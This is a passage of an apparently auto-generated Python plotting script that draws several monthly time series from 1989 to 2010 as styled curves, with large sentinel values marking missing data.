mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 4.9 , 4.9 , 4.2 , 4.3 , 3.5 , 3.4 , 3.2 , 3.3 , 3.6 ,
3.8 , 4.4 , 4.6 , 4.7 , 4.4 , 4.8 , 4.2 , 3.7 , 3.2 ,
2.9 , 3.2 , 3.6 , 3.9 , 4.2 , 4.6 , 4.4 , 4.6 , 4.2 ,
4.1 , 3.5 , 3.2 , 2.9 , 3. , 3.6 , 4.1 , 4. , 4.6 ,
4.1 , 4.2 , 4. , 3.9 , 3.6 , 3.3 , 3. , 3. , 3.5 ,
3.5 , 4.1 , 4.2 , 4.3 , 4.1 , 4.2 , 3.6 , 3.4 , 3. ,
2.9 , 2.9 , 3.3 , 3.7 , 4. , 4.1 , 4.1 , 4.1 , 4.1 ,
3.7 , 3.3 , 3. , 2.7 , 2.7 , 3.2 , 3.5 , 4.2 , 4.1 ,
4.3 , 4.3 , 4.2 , 3.7 , 3.1 , 3. , 2.5 , 2.7 , 3.1 ,
3.6 , 4.1 , 3.9 , 4.3 , 4.2 , 4.1 , 3.5 , 3.5 , 2.7 ,
2.7 , 2.7 , 3.4 , 3.8 , 3.9 , 4.2 , 4.4 , 4.1 , 3.7 ,
3.6 , 3.2 , 3. , 2.5 , 2.8 , 3.2 , 3.5 , 3.8 , 3.9 ,
3.8 , 3.9 , 3.8 , 3.3 , 3. , 2.8 , 2.5 , 2.6 , 2.9 ,
3.3 , 3.5 , 3.9 , 3.9 , 3.8 , 3.6 , 3.3 , 3.1 , 2.9 ,
2.6 , 2.6 , 2.9 , 3.2 , 3.4 , 3.5 , 3.8 , 3.5 , 3.3 ,
3. , 2.8 , 2.7 , 2.4 , 2.4 , 2.8 , 2.9 , 3.2 , 3.3 ,
3.3 , 3.2 , 2.9 , 2.8 , 2.6 , 2.4 , 2.3 , 2.2 , 2.7 ,
2.6 , 3.1 , 3.1 , 3.2 , 3. , 3.1 , 2.8 , 2.4 , 2.3 ,
2.3 , 2.2 , 2.5 , 2.7 , 2.9 , 3.1 , 2.9 , 2.8 , 2.8 ,
2.5 , 2.4 , 2. , 2. , 2.1 , 2.4 , 2.7 , 2.7 , 2.9 ,
2.8 , 2.8 , 2.8 , 2.4 , 2.2 , 2. , 1.8 , 2. , 2.2 ,
2.5 , 2.6 , 2.9 , 2.8 , 2.8 , 2.6 , 2.4 , 2.1 , 2. ,
1.9 , 2. , 2.3 , 2.5 , 2.6 , 2.7 , 2.9 , 2.9 , 2.5 ,
2.3 , 2.1 , 2. , 2. , 1.8 , 2.2 , 2.4 , 2.5 , 2.8 ,
2.6 , 2.6 , 2.4 , 2.3 , 2. , 1.8 , 1.7 , 1.8 , 2. ,
2.1 , 2.4 , 2.5 , 2.5 , 2.4 , 2.2 , 2.1 , 1.9 , 1.8 ,
1.6 , 1.6 , 1.8 , 2.2 , 2.2 , 2.5 , 2.4 , 2.4 , 2.4 ,
2. , 1.9 , 1.7 , 1.6 , 1.7 , 1.8 , 2.1 , 2.3 , 2.6 ,
2.4 , 2.2 , 2.3 , 2. , 1.8 , 1.7 , 1.6 , 1.6 , 1.79,
1.94, 2.14, 2.37])) #264
mpp.setc('graph_missing_data_colour','red')
mpp.seti('graph_symbol_marker_index',15)
mpp.setc('graph_symbol_colour','red')
mpp.setc('graph_missing_data_style','dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','red')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 7.4 , 7.7 , 7.1 , 6.6 , 5.7 , 5.1 , 4.8 , 5.1 , 5.8 ,
6.5 , 7.3 , 7.6 , 7.2 , 6.8 , 7.8 , 6.8 , 5.7 , 5.1 ,
4.3 , 4.7 , 5.7 , 6.5 , 7.2 , 7.5 , 7. , 7.4 , 6.9 ,
6.6 , 5.4 , 4.8 , 4.3 , 4.6 , 5.7 , 6.8 , 6.9 , 7.8 ,
7. , 7.1 , 6.6 , 6.6 , 5.8 , 5.3 , 4.6 , 4.7 , 5.9 ,
6. , 7. , 7.2 , 7.2 , 6.8 , 6.9 , 6. , 5.6 , 4.9 ,
4.5 , 4.2 , 5.2 , 6.3 , 6.8 , 6.8 , 6.8 , 7.5 , 6.6 ,
6.3 , 5.3 , 4.8 , 4.3 , 4.1 , 5.1 , 6. , 6.8 , 7.1 ,
6.8 , 7.1 , 6.6 , 6.1 , 5. , 4.7 , 3.9 , 4.2 , 5. ,
6. , 7. , 6.2 , 6.9 , 7. , 6.5 , 5.6 , 5.6 , 4.2 ,
4.2 , 4.3 , 5.3 , 6.3 , 7.1 , 6.9 , 7.2 , 6.7 , 6.4 ,
5.9 , 5.2 , 4.8 , 4. , 4.5 , 5.1 , 6. , 6.5 , 6.6 ,
6.4 , 6.4 , 6.3 , 5.7 , 5.1 , 4.5 , 3.8 , 4.2 , 5.2 ,
6. , 6.2 , 6.4 , 6.4 , 6.5 , 6. , 5.7 , 5.5 , 4.5 ,
4.2 , 4.3 , 5.1 , 5.5 , 5.9 , 5.8 , 6.5 , 5.9 , 5.8 ,
5.4 , 4.9 , 4.5 , 3.9 , 3.9 , 4.7 , 5.1 , 5.4 , 5.6 ,
5.7 , 5.9 , 5.2 , 5. , 4.6 , 4.1 , 4. , 4. , 4.7 ,
5. , 5.5 , 5.6 , 5.5 , 5.6 , 5.6 , 4.9 , 4.3 , 3.9 ,
3.9 , 3.8 , 4.6 , 4.6 , 5.3 , 5.6 , 5.3 , 5.1 , 5.3 ,
4.4 , 4.3 , 3.7 , 3.4 , 3.7 , 4.5 , 5. , 4.9 , 5.1 ,
5.3 , 4.8 , 4.9 , 4.4 , 4.1 , 3.8 , 3. , 3.6 , 4.3 ,
4.9 , 4.9 , 5.3 , 5. , 5. , 4.9 , 4.3 , 3.9 , 3.7 ,
3.3 , 3.4 , 4.3 , 4.9 , 5. , 5. , 5.1 , 5.3 , 4.8 ,
4.2 , 3.8 , 3.4 , 3.5 , 3.1 , 4.2 , 4.6 , 4.9 , 5.1 ,
4.8 , 4.8 , 4.5 , 4.2 , 3.8 , 3.3 , 3. , 3.4 , 3.9 ,
4.2 , 4.6 , 4.7 , 4.7 , 4.9 , 4.3 , 4.2 , 3.6 , 3.3 ,
3. , 3. , 3.6 , 4.4 , 4.2 , 5. , 4.4 , 4.7 , 4.9 ,
3.8 , 3.8 , 3.2 , 2.9 , 3. , 3.6 , 4.2 , 4.5 , 5.1 ,
4.5 , 4.3 , 4.4 , 4.1 , 3.3 , 3.1 , 3. , 3.1 , 3.5 ,
3.76, 4.23, 4.62])) #264
mpp.setc('graph_missing_data_colour','red')
mpp.seti('graph_symbol_marker_index',1)
mpp.setc('graph_symbol_colour','red')
mpp.setc('graph_missing_data_style','solid')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','solid')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','brick')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 5.70000000e+00, 5.90000000e+00, 5.40000000e+00,
5.00000000e+00, 4.30000000e+00, 3.90000000e+00,
3.50000000e+00, 3.70000000e+00, 4.30000000e+00,
4.60000000e+00, 5.00000000e+00, 5.10000000e+00,
5.20000000e+00, 5.00000000e+00, 4.90000000e+00,
4.30000000e+00, 4.00000000e+00, 3.50000000e+00,
3.30000000e+00, 3.40000000e+00, 3.90000000e+00,
4.30000000e+00, 4.80000000e+00, 5.10000000e+00,
5.10000000e+00, 5.10000000e+00, 4.80000000e+00,
4.50000000e+00, 4.10000000e+00, 3.70000000e+00,
3.30000000e+00, 3.50000000e+00, 3.90000000e+00,
4.40000000e+00, 4.40000000e+00, 5.20000000e+00,
5.00000000e+00, 5.10000000e+00, 4.70000000e+00,
4.30000000e+00, 4.00000000e+00, 3.80000000e+00,
3.50000000e+00, 3.50000000e+00, 3.80000000e+00,
4.20000000e+00, 4.70000000e+00, 5.10000000e+00,
5.60000000e+00, 5.20000000e+00, 5.10000000e+00,
4.20000000e+00, 3.80000000e+00, 3.60000000e+00,
3.30000000e+00, 3.40000000e+00, 3.90000000e+00,
4.30000000e+00, 4.90000000e+00, 4.70000000e+00,
4.80000000e+00, 5.10000000e+00, 4.80000000e+00,
4.20000000e+00, 3.70000000e+00, 3.60000000e+00,
3.40000000e+00, 3.40000000e+00, 3.90000000e+00,
4.00000000e+00, 4.70000000e+00, 5.10000000e+00,
5.10000000e+00, 4.90000000e+00, 4.90000000e+00,
4.20000000e+00, 3.80000000e+00, 3.70000000e+00,
3.30000000e+00, 3.30000000e+00, 3.90000000e+00,
4.10000000e+00, 5.00000000e+00, 4.50000000e+00,
5.10000000e+00, 5.00000000e+00, 4.60000000e+00,
3.90000000e+00, 3.70000000e+00, 3.20000000e+00,
3.20000000e+00, 3.10000000e+00, 3.50000000e+00,
4.00000000e+00, 4.30000000e+00, 4.70000000e+00,
4.70000000e+00, 4.50000000e+00, 4.20000000e+00,
3.80000000e+00, 3.50000000e+00, 3.40000000e+00,
2.80000000e+00, 3.20000000e+00, 3.70000000e+00,
3.90000000e+00, 4.50000000e+00, 5.00000000e+00,
4.80000000e+00, 4.80000000e+00, 4.30000000e+00,
3.80000000e+00, 3.60000000e+00, 3.10000000e+00,
2.80000000e+00, 2.90000000e+00, 3.60000000e+00,
4.20000000e+00, 4.20000000e+00, 5.00000000e+00,
4.90000000e+00, 4.90000000e+00, 4.30000000e+00,
4.20000000e+00, 3.50000000e+00, 3.20000000e+00,
3.00000000e+00, 3.00000000e+00, 3.60000000e+00,
4.30000000e+00, 4.90000000e+00, 4.50000000e+00,
4.50000000e+00, 4.20000000e+00, 4.00000000e+00,
3.50000000e+00, 3.20000000e+00, 3.10000000e+00,
2.80000000e+00, 2.80000000e+00, 1.70000000e+38,
3.70000000e+00, 3.70000000e+00, 4.20000000e+00,
4.10000000e+00, 4.30000000e+00, 3.80000000e+00,
3.70000000e+00, 3.30000000e+00, 3.20000000e+00,
2.90000000e+00, 2.90000000e+00, 3.30000000e+00,
3.60000000e+00, 3.70000000e+00, 4.10000000e+00,
4.24000000e+00, 4.24000000e+00, 4.00000000e+00,
3.54000000e+00, 3.25000000e+00, 2.99000000e+00,
2.86000000e+00, 2.89000000e+00, 3.10000000e+00,
3.26000000e+00, 3.55000000e+00, 4.04000000e+00,
3.90000000e+00, 3.68000000e+00, 1.70000000e+38,
3.47000000e+00, 3.32000000e+00, 2.75000000e+00,
2.94000000e+00, 2.75000000e+00, 3.14000000e+00,
3.60000000e+00, 3.41000000e+00, 3.82000000e+00,
3.79000000e+00, 3.69000000e+00, 3.40000000e+00,
3.25000000e+00, 2.77000000e+00, 2.62000000e+00,
2.44000000e+00, 2.60000000e+00, 2.89000000e+00,
3.25000000e+00, 3.32000000e+00, 3.75000000e+00,
3.49000000e+00, 3.37000000e+00, 3.18000000e+00,
2.95000000e+00, 2.70000000e+00, 2.39000000e+00,
2.35000000e+00, 2.31000000e+00, 2.77000000e+00,
2.86000000e+00, 3.19000000e+00, 3.38000000e+00,
3.50000000e+00, 3.46000000e+00, 3.05000000e+00,
2.74000000e+00, 2.51000000e+00, 2.34000000e+00,
2.45000000e+00, 2.20000000e+00, 2.70000000e+00,
2.89000000e+00, 3.30000000e+00, 3.41000000e+00,
3.49000000e+00, 3.26000000e+00, 3.06000000e+00,
2.76000000e+00, 2.55000000e+00, 2.30000000e+00,
2.20000000e+00, 2.24000000e+00, 1.70000000e+38,
2.79000000e+00, 3.30000000e+00, 2.96000000e+00,
3.08000000e+00, 3.11000000e+00, 2.61000000e+00,
2.54000000e+00, 2.36000000e+00, 2.29000000e+00,
2.14000000e+00, 2.09000000e+00, 2.24000000e+00,
2.62000000e+00, 2.59000000e+00, 3.02000000e+00,
2.87000000e+00, 2.74000000e+00, 2.79000000e+00,
2.36000000e+00, 2.23000000e+00, 2.06000000e+00,
2.02000000e+00, 2.05000000e+00, 2.28000000e+00,
2.59000000e+00, 2.66000000e+00, 2.88000000e+00,
2.89000000e+00, 2.78000000e+00, 2.72000000e+00,
2.38000000e+00, 2.22000000e+00, 2.00000000e+00,
2.06000000e+00, 2.05000000e+00, 2.26000000e+00,
2.42000000e+00, 2.70000000e+00, 2.88000000e+00])) #264
mpp.setc('graph_missing_data_colour','brick')
mpp.seti('graph_symbol_marker_index',18)
mpp.setc('graph_symbol_colour','brick')
mpp.setc('graph_missing_data_style','dot')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dot')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','brick')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', 